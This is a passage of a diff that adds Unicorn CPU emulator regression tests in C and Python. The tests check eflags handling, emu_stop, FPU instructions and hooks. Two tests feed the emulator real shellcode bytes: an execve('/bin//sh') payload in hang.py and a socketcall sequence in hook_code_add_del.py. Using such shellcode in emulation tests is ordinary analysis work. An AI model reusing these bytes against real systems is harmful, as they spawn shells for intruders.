"%0"); +#elif defined(__x86_64__) + puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag. + + __asm__("pushfq\n\t" + "pushq %0\n\t" + "popfq\n\t" + "pushfq\n\t" + "popq %0\n\t" + "popfq" + : "=r"(val) + : "r"(i) + : "%0"); +#endif + + printf("Real system eflags: 0x%08"PRIX3264"\n", val); + + return (uint32_t)val & 0xFFFFFFFF; +} + +static void VM_exec() +{ +#if defined(__i386__) || defined(__x86_64__) + uc_engine *uc; + uc_err err; + unsigned int r_eax, eflags, r_esp, realflags = 0; + + r_eax = 0; + r_esp = ADDRESS+0x100; //some safe distance from main code. + eflags = 0x00000206; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s\n", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n", uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); //make stack pointer point to already mapped memory so we don't need to hook. + uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_close(uc); + + printf(">>> Emulation done. Below is the CPU context\n"); + printf(">>> EAX = 0x%08X\n", r_eax); + printf(">>> EFLAGS = 0x%08X\n", eflags); + + realflags = realEflags(); + + assert(r_eax == realflags); +#endif +} + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_nosync.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_nosync.c new file mode 100644 index 0000000..37b7950 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_nosync.c @@ -0,0 +1,182 @@ +#include +#include +#include + +#include + +#define X86_CODE32 "\x33\xD2\x8A\xD4\x8B\xC8\x81\xE1\xFF\x00\x00\x00" // XOR edx,edx; MOV dl,ah; MOV ecx,eax; AND ecx,FF +#define ADDRESS 0x1000000 +#define PAGE_8K (1 << 13) +#define PAGE_4K (1 << 12) +#define TARGET_PAGE_MASK ~(PAGE_4K - 1) +#define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK) +#define TARGET_PAGE_ALIGN(addr) ((addr - (TARGET_PAGE_PREPARE(addr) - addr)) & TARGET_PAGE_MASK) + +static uint64_t instructions = 0; + +static void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + instructions++; +} + +static bool hook_invalid_mem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) +{ + uc_err err; + uint64_t address_align = TARGET_PAGE_ALIGN(address); + + if(address == 0) + { + printf("Address is 0, proof 0x%" PRIx64 "\n", address); + return false; + } + + switch(type) + { + default: + return false; + break; + case UC_MEM_WRITE_UNMAPPED: + printf("Mapping write address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align); + + err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory on UC_MEM_WRITE_UNMAPPED %s\n", uc_strerror(err)); + return false; + } + + return true; + break; + case UC_MEM_READ_UNMAPPED: + + printf("Mapping read address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align); + + + err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory on UC_MEM_READ_UNMAPPED %s\n", uc_strerror(err)); + return false; + } + + return true; + break; + } +} + +static void VM_exec() +{ + uc_engine *uc; + uc_err err; + uc_hook trace1, trace2; + unsigned int r_eax, r_ebx, r_ecx, r_edx, r_ebp, r_esp, r_esi, r_edi, r_eip, eflags; + unsigned int tr_eax, tr_ebx, tr_ecx, tr_edx, tr_ebp, tr_esp, tr_esi, tr_edi, tr_eip, t_eflags; + + + r_eax = tr_eax = 0x1DB10106; + r_ebx = tr_ebx = 0x7EFDE000; + r_ecx = tr_ecx = 0x7EFDE000; + r_edx = tr_edx = 0x00001DB1; + r_ebp = tr_ebp = 0x0018FF88; + r_esp = tr_esp = 0x0018FF14; + r_esi = tr_esi = 0x0; + r_edi = tr_edi = 0x0; + r_eip = tr_eip = 0x004939F3; + t_eflags = eflags = 0x00000206; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %zu)", uc_strerror(err), sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx); + uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); + uc_reg_write(uc, UC_X86_REG_EBP, &r_ebp); + uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); + uc_reg_write(uc, UC_X86_REG_ESI, &r_esi); + uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_hook_add(uc, &trace1, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, (void *)hook_invalid_mem, NULL, 1, 0); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, &trace2, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s", err, uc_strerror(err)); + instructions = 0; + + uc_close(uc); + return; + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx); + uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); + uc_reg_read(uc, UC_X86_REG_EBP, &r_ebp); + uc_reg_read(uc, UC_X86_REG_ESP, &r_esp); + uc_reg_read(uc, UC_X86_REG_ESI, &r_esi); + uc_reg_read(uc, UC_X86_REG_EDI, &r_edi); + uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); + uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); + + uc_close(uc); + + printf(">>> Emulation done. Below is the CPU context\n"); + printf(">>> EAX = 0x%08X %s\n", r_eax, (r_eax == tr_eax ? "" : "(m)")); + printf(">>> EBX = 0x%08X %s\n", r_ebx, (r_ebx == tr_ebx ? "" : "(m)")); + printf(">>> ECX = 0x%08X %s\n", r_ecx, (r_ecx == tr_ecx ? "" : "(m)")); + printf(">>> EDX = 0x%08X %s\n", r_edx, (r_edx == tr_edx ? "" : "(m)")); + printf(">>> EBP = 0x%08X %s\n", r_ebp, (r_ebp == tr_ebp ? "" : "(m)")); + printf(">>> ESP = 0x%08X %s\n", r_esp, (r_esp == tr_esp ? "" : "(m)")); + printf(">>> ESI = 0x%08X %s\n", r_esi, (r_esi == tr_esi ? "" : "(m)")); + printf(">>> EDI = 0x%08X %s\n", r_edi, (r_edi == tr_edi ? "" : "(m)")); + printf(">>> EIP = 0x%08X %s\n", (r_eip - ADDRESS) + tr_eip, (r_eip == tr_eip ? "" : "(m)\n")); + printf(">>> EFLAGS = 0x%08X %s\n", eflags, (eflags == t_eflags ? "" : "(m)")); + + printf(">>> Instructions executed %" PRIu64 "\n", instructions); + + assert(r_eax == 0x1DB10106); + assert(r_ebx == 0x7EFDE000); + assert(r_ecx == 0x00000006); + assert(r_edx == 0x00000001); + assert(r_ebp == 0x0018FF88); + assert(r_esp == 0x0018FF14); + assert(r_esi == 0x00000000); + assert(r_edi == 0x00000000); + assert(eflags == 0x00000206); //we shouldn't fail this assert, eflags should be 0x00000206 because the last AND instruction produces a non-zero result. + + instructions = 0; +} + + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.c new file mode 100644 index 0000000..7f03ec3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.c @@ -0,0 +1,151 @@ +#include +#include +#include + +#include + +static int count = 1; + +bool cb_hookunmapped(uc_engine *uc, uc_mem_type type, uint64_t address, uint32_t size, int64_t value, void *user_data) { + uint32_t pc = 0; + uc_reg_read(uc, UC_X86_REG_EIP, &pc); + fprintf(stderr, "mem unmapped: 0x%x type: %x address: 0x%"PRIx64" length: %x value: 0x%"PRIx64"\n", + pc, type, address, size, value); + + uc_err err = UC_ERR_OK; + err = uc_emu_stop(uc); + if (err != UC_ERR_OK) { + fprintf(stderr, "stop not ok"); + exit(0); + } + return true; +} + +// move esi, dword ptr [ecx + eax + 0x28] +// add esi, eax +// lea eax, dword ptr [ebp - 4] +// push eax +// push 0x40 +// push 0x10 +// push esi +// call some address +#define CODE "\x8B\x74\x01\x28" \ + "\x0C\xF0" \ + "\x8D\x45\xFC" \ + "\x50" \ + "\x6A\x40" \ + "\x6A\x10" \ + "\x56" \ + "\xFF\x15\x20\x20\x00\x10" + +int main() { + uc_engine *uc; + + uc_err err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_open\n", count++); + + err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_map: code\n", count++); + + uint8_t code[0x1000]; + memset(code, 0x0, sizeof(code)); + memcpy(code, CODE, sizeof(CODE)); + + err = uc_mem_write(uc, 0x1000, code, sizeof(code)); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_write: code\n", count++); + + uint32_t eip = 0x1000; + err = uc_reg_write(uc, UC_X86_REG_EIP, &eip); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++); + + err = uc_mem_map(uc, 0x4000, 0x4000, UC_PROT_ALL); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_map: stack\n", count++); + + uint8_t stack[0x4000]; + memset(stack, 0x0, sizeof(stack)); + + err = uc_mem_write(uc, 0x4000, code, sizeof(code)); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_write: stack\n", count++); + + uint32_t esp = 0x6000; + err = uc_reg_write(uc, UC_X86_REG_ESP, &esp); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: esp\n", count++); + + uint32_t ebp = 0x6000; + err = uc_reg_write(uc, UC_X86_REG_EBP, &ebp); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: ebp\n", count++); + + uc_hook h1; + + err = uc_hook_add(uc, &h1, UC_HOOK_MEM_UNMAPPED, cb_hookunmapped, NULL, 1, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_hook_add\n", count++); + + // this should execute only a single instruction at 0x1000, because + // that instruction accesses invalid memory. + err = uc_emu_start(uc, 0x1000, 0x100F, 0, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_emu_start\n", count++); + + // yes, not necessary, but to demonstrate the UC API is working as expected + eip = 0x1004; + err = uc_reg_write(uc, UC_X86_REG_EIP, &eip); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++); + + // this should execute the remaining instructions up to (but not includign) 0x100F. + // currently, it returns an error about an unmapped read. + // seems that this error should have been returned in the previous call + // to emu_start. + err = uc_emu_start(uc, 0x1004, 0x100F, 0, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_emu_start\n", count++); + + fprintf(stderr, "ok %d - Done", count++); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.py new file mode 100644 index 0000000..4fb6b1d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_clear_errors.py @@ -0,0 +1,80 @@ +#!/usr/bin/python + +from __future__ import print_function +import binascii +import regress + +from unicorn import * +from unicorn.x86_const import * + + +CODE = binascii.unhexlify(b"".join([ + b"8B 74 01 28", # mov esi, dword ptr [ecx + eax + 0x28] mapped: 0x1000 + b"03 F0", # add esi, eax 0x1004 + b"8D 45 FC", # lea eax, dword ptr [ebp - 4] 0x1006 + b"50", # push eax 0x1009 + b"6A 40", # push 0x40 0x100A + b"6A 10", # push 0x10 0x100C + b"56", # push esi 0x100E + b"FF 15 20 20 00 10" # call some address 0x100F + ]).replace(" ", "")) + + +def showpc(mu): + pc = mu.reg_read(UC_X86_REG_EIP) + print("pc: 0x%x" % (pc)) + + +class HookCodeStopEmuTest(regress.RegressTest): + def test_hook_code_stop_emu(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # base of CODE + mu.mem_map(0x1000, 0x1000) + mu.mem_write(0x1000, CODE) + mu.reg_write(UC_X86_REG_EIP, 0x1000) + + # base of STACK + mu.mem_map(0x4000, 0x4000) + mu.mem_write(0x4000, "\x00" * 0x4000) + mu.reg_write(UC_X86_REG_ESP, 0x6000) + mu.reg_write(UC_X86_REG_EBP, 0x6000) + + mu.reg_write(UC_X86_REG_ECX, 0x0) + mu.reg_write(UC_X86_REG_EAX, 0x0) + + def _hook(_, access, address, length, value, context): + pc = mu.reg_read(UC_X86_REG_EIP) + print("mem unmapped: pc: %x access: %x address: %x length: %x value: %x" % ( + pc, access, address, length, value)) + mu.emu_stop() + return True + + mu.hook_add(UC_HOOK_MEM_UNMAPPED, _hook) + + # we only expect the following instruction to execute, + # and it will fail, because it accesses unmapped memory. + # mov esi, dword ptr [ecx + eax + 0x28] mapped: 0x1000 + mu.emu_start(0x1000, 0x100F) + showpc(mu) + + # now, we want to reuse the emulator, and keep executing + # from the next instruction + mu.reg_write(UC_X86_REG_EIP, 0x1004) + self.assertEqual(0x1004, mu.reg_read(UC_X86_REG_EIP)) + + # we expect the following instructions to execute + # add esi, eax 0x1004 + # lea eax, dword ptr [ebp - 4] 0x1006 + # push eax 0x1009 + # push 0x40 0x100A + # push 0x10 0x100C + # push esi 0x100E + # + # currently, a UC_ERR_READ_UNMAPPED exception is raised here + mu.emu_start(0x1004, 0x100F) + showpc(mu) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_in_hook_overrun.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_in_hook_overrun.c new file mode 100644 index 0000000..81ea93f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_in_hook_overrun.c @@ -0,0 +1,130 @@ +/* +Test for uc_emu_stop() in code hook not always stopping the emu at the current instruction. +(Sometimes it will execute and stop at the next instruction). +*/ + +// windows specific +#ifdef _MSC_VER +#include +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#include "pthread.h" +#endif // _MSC_VER + +// common includes +#include + + +// Test MIPS little endian code. +// This should loop forever. +const uint64_t addr = 0x100000; +const unsigned char test_code[] = { + 0x00,0x00,0x00,0x00, // 100000: nop + 0x00,0x00,0x00,0x00, // 100004: nop + 0x00,0x00,0x00,0x00, // 100008: nop + 0x00,0x00,0x00,0x00, // 10000C: nop +}; +bool test_passed_ok = false; + + +// This hook is used to show that code is executing in the emulator. +static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf("Executing: %"PRIx64"\n", address); + if( address == 0x100008 ) + { + printf("Stopping at: %"PRIx64"\n", address); + uc_emu_stop(uc); + } +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook hhc; + uint32_t val; + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + printf("uc_open()\n"); + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + printf("uc_mem_map()\n"); + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // write machine code to be emulated to memory + printf("uc_mem_write()\n"); + err = uc_mem_write(uc, addr, test_code, sizeof(test_code)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + printf("uc_hook_add()\n"); + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + // start executing code + printf("uc_emu_start()\n"); + uc_emu_start(uc, addr, addr+sizeof(test_code), 0, 0); + + + // done executing, print some reg values as a test + uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); + test_passed_ok = val == 0x100008; + + // free resources + printf("uc_close()\n"); + uc_close(uc); + + if( test_passed_ok ) + printf("\n\nTEST PASSED!\n\n"); + else + printf("\n\nTEST FAILED!\n\n"); + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_segfault.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_segfault.py new file mode 100644 index 0000000..8c22e9d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/emu_stop_segfault.py @@ -0,0 +1,20 @@ +#!/usr/bin/python + +"""See https://github.com/unicorn-engine/unicorn/issues/65""" + +import unicorn +import regress + +class EmuStopSegFault(regress.RegressTest): + + def runTest(self): + ADDR = 0x10101000 + mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) + mu.mem_map(ADDR, 1024 * 4) + mu.mem_write(ADDR, b'\x41') + mu.emu_start(ADDR, ADDR + 1, count=1) + # The following should not trigger a null pointer dereference + self.assertEqual(None, mu.emu_stop()) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/ensure_typedef_consts_generated.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ensure_typedef_consts_generated.py new file mode 100644 index 0000000..04948a5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/ensure_typedef_consts_generated.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +"""See https://github.com/unicorn-engine/unicorn/issues/161 + +Ensure that constants which are specified via a typedef, rather than an enum, +are included in the bindings by the script for autogenerating mappings for +constants. +""" + +import unicorn + +try: + unicorn.UC_HOOK_MEM_UNMAPPED +except AttributeError: + assert(False and "Definition for UC_HOOK_MEM_UNMAPPED not generated") diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_ip.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_ip.py new file mode 100644 index 0000000..3db6a8b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_ip.py @@ -0,0 +1,69 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * +from capstone import * +import regress + +ESP = 0x2000 +PAGE_SIZE = 2 * 1024 * 1024 + +# mov [esp], DWORD 0x37f +# fldcw [esp] +# fnop +# fnstenv [esp + 8] +# pop ecx +CODE = b'\xc7\x04\x24\x7f\x03\x00\x00\xd9\x2c\x24\xd9\xd0\xd9\x74\x24\x08\x59' + +class SimpleEngine: + def __init__(self): + self.capmd = Cs(CS_ARCH_X86, CS_MODE_32) + + def disas_single(self, data): + for i in self.capmd.disasm(data, 16): + print("\t%s\t%s" % (i.mnemonic, i.op_str)) + break + +disasm = SimpleEngine() + +def hook_code(uc, addr, size, user_data): + mem = uc.mem_read(addr, size) + print(" 0x%X:" % (addr)), + disasm.disas_single(str(mem)) + +class FpuIP(regress.RegressTest): + + def mem_reader(self, mu, addr, size, expected): + tmp = mu.mem_read(addr, size) + for out, exp in zip(tmp, expected): + self.assertEqual(exp, out) + + def test_32(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + mu.mem_map(0x0, PAGE_SIZE) + mu.mem_write(0x4000, CODE) + mu.reg_write(UC_X86_REG_ESP, ESP) + mu.hook_add(UC_HOOK_CODE, hook_code) + + mu.emu_start(0x4000, 0, 0, 5) + esp = mu.reg_read(UC_X86_REG_ESP) + self.assertEqual(0x2004, esp) + expected = [0x0, 0x0, 0xa, 0x40] + self.mem_reader(mu, esp + 14, 4, expected) + + def test_64(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(0x0, PAGE_SIZE) + mu.mem_write(0x4000, CODE) + mu.reg_write(UC_X86_REG_ESP, ESP) + mu.hook_add(UC_HOOK_CODE, hook_code) + + mu.emu_start(0x4000, 0, 0, 5) + rsp = mu.reg_read(UC_X86_REG_RSP) + self.assertEqual(0x2012, rsp + 10) + expected = [0x0, 0x0, 0xa, 0x40, 0x0, 0x0, 0x0, 0x0] + self.mem_reader(mu, rsp + 10, 4, expected) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_mem_write.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_mem_write.py new file mode 100644 index 0000000..4017dec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/fpu_mem_write.py @@ -0,0 +1,38 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.x86_const import * + +import regress + +ESP = 0x2000 +PAGE_SIZE = 1 * 1024 * 1024 + +# wait +# fnstcw word ptr [esp] +# pop ecx +CODE = b'\x9B\xD9\x3C\x24\x59' + +def hook_mem_write(uc, access, address, size, value, user_data): + print("mem WRITE: 0x%x, data size = %u, data value = 0x%x" % (address, size, value)) + return True + +class FpuWrite(regress.RegressTest): + + def mem_reader(self, mu, addr, size, expected): + tmp = mu.mem_read(addr, size) + for i, e in zip(tmp, expected): + self.assertEquals(e, i) + + def runTest(self): + mu = Uc(UC_ARCH_X86, UC_MODE_32) + mu.mem_map(0, PAGE_SIZE) + mu.mem_write(0, CODE) + mu.reg_write(UC_X86_REG_ESP, ESP) + + mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_write) + mu.emu_start(0x0, 5, 0, 2) + esp = mu.reg_read(UC_X86_REG_ESP) + self.mem_reader(mu, esp, 10, [0] * 10) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hang.py new file mode 100644 index 0000000..9c8a377 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hang.py @@ -0,0 +1,57 @@ +#!/usr/bin/python + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +import regress + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + tmp = uc.mem_read(address, size) + print("[0x%x] =" %(address), end="") + for i in tmp: + print(" %02x" %i, end="") + print("") + +# callback for tracing Linux interrupt +def hook_intr(uc, intno, user_data): + # only handle Linux syscall + rip = uc.reg_read(UC_X86_REG_RIP) + if intno != 0x80: + print("=== 0x%x: got interrupt %x, quit" %(rip, intno)); + uc.emu_stop() + return + + eax = uc.reg_read(UC_X86_REG_EAX) + print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(rip, intno, eax)) + +class Hang(regress.RegressTest): + + def runTest(self): + binary1 = b'\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41' + + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(0, 2 * 1024 * 1024) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # handle interrupt ourself + mu.hook_add(UC_HOOK_INTR, hook_intr) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, 1024 * 1024) + + # fill in memory with 0xCC (software breakpoint int 3) + for i in xrange(1 * 1024): + mu.mem_write(0 + i, b'\xcc') + + # write machine code to be emulated to memory + mu.mem_write(0, binary1) + + self.assertEqual(mu.emu_start(0, len(binary1)), None) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_add_crash.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_add_crash.py new file mode 100644 index 0000000..342e7fa --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_add_crash.py @@ -0,0 +1,16 @@ +#!/usr/bin/env python + +"""https://github.com/unicorn-engine/unicorn/issues/165""" + +import unicorn + +def hook_mem_read_unmapped(mu, access, address, size, value, user_data): + pass + +mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) + +try: + for x in range(0, 1000): + mu.hook_add(unicorn.UC_HOOK_MEM_READ_UNMAPPED, hook_mem_read_unmapped, None) +except unicorn.UcError as e: + print("ERROR: %s" % e) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_add_del.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_add_del.py new file mode 100644 index 0000000..ef071ca --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_add_del.py @@ -0,0 +1,48 @@ +#!/usr/bin/python + +'''https://github.com/unicorn-engine/unicorn/issues/334''' + +from __future__ import print_function +import regress + +from unicorn import * +from unicorn.x86_const import * + +ADDRESS = 0x8048000 +STACK_ADDRESS = 0xffff000 +STACK_SIZE = 4096 +''' +31 DB xor ebx, ebx +53 push ebx +43 inc ebx +53 push ebx +6A 02 push 2 +6A 66 push 66h +58 pop eax +89 E1 mov ecx, esp +CD 80 int 80h +''' +CODE = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80" +EP = ADDRESS + 0x54 + +def hook_code(mu, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + +class HookCodeAddDelTest(regress.RegressTest): + def runTest(self): + emu = Uc(UC_ARCH_X86, UC_MODE_32) + emu.mem_map(ADDRESS, 0x1000) + emu.mem_write(EP, CODE) + + emu.mem_map(STACK_ADDRESS, STACK_SIZE) + emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE) + + # UC_HOOK_CODE hook will work even after deletion + i = emu.hook_add(UC_HOOK_CODE, hook_code, None) + emu.hook_del(i) + + emu.emu_start(EP, EP + len(CODE), count = 3) + print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/hook_code_stop_emu.py 